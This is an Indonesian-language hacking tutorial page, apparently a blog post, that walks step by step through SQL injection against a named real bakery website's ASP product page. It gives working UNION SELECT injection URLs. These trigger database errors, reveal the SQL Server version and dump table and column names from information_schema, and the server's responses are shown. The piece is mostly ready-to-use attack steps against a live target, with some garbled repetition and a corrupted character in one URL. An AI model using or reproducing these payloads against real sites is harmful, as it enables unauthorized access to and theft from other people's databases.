Filename | SQL Injection ASP |
Permission | rwxr--r-- |
Author | Fell Sadiz |
Modified | 8/30/2012 06:34:00 AM |
Group | Exploit | Hacking | Tutorial |
Actions | |
Navigation | / Home / Exploit / Hacking / Tutorial / SQL Injection ASP |
Demo Site :
Tambahi Syntak apa kek misal ' / =
Lanjut Ke Tahap Kedua
angka Togelna 3 kan
Kita Cek Versinya Dolo angka Togel /visible Colom dirubah
Oke Tahap Ketiga
Schema Database :))
http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33
Having Error
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/Product_Des.asp, line 11
Lanjut Ke Tahap Kedua
Code:
http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,2,3,4--
Kita Cek Versinya Dolo angka Togel /visible Colom dirubah
Code:
http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,@@VERSION,3,4--
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright © 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Oke Tahap Ketiga
Schema Database :))
Code:
http://www।astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+all+1,column_name,table_name,4+from+information_schema.columns--
1 Respons:
Microsoft SQL Server 2000 Error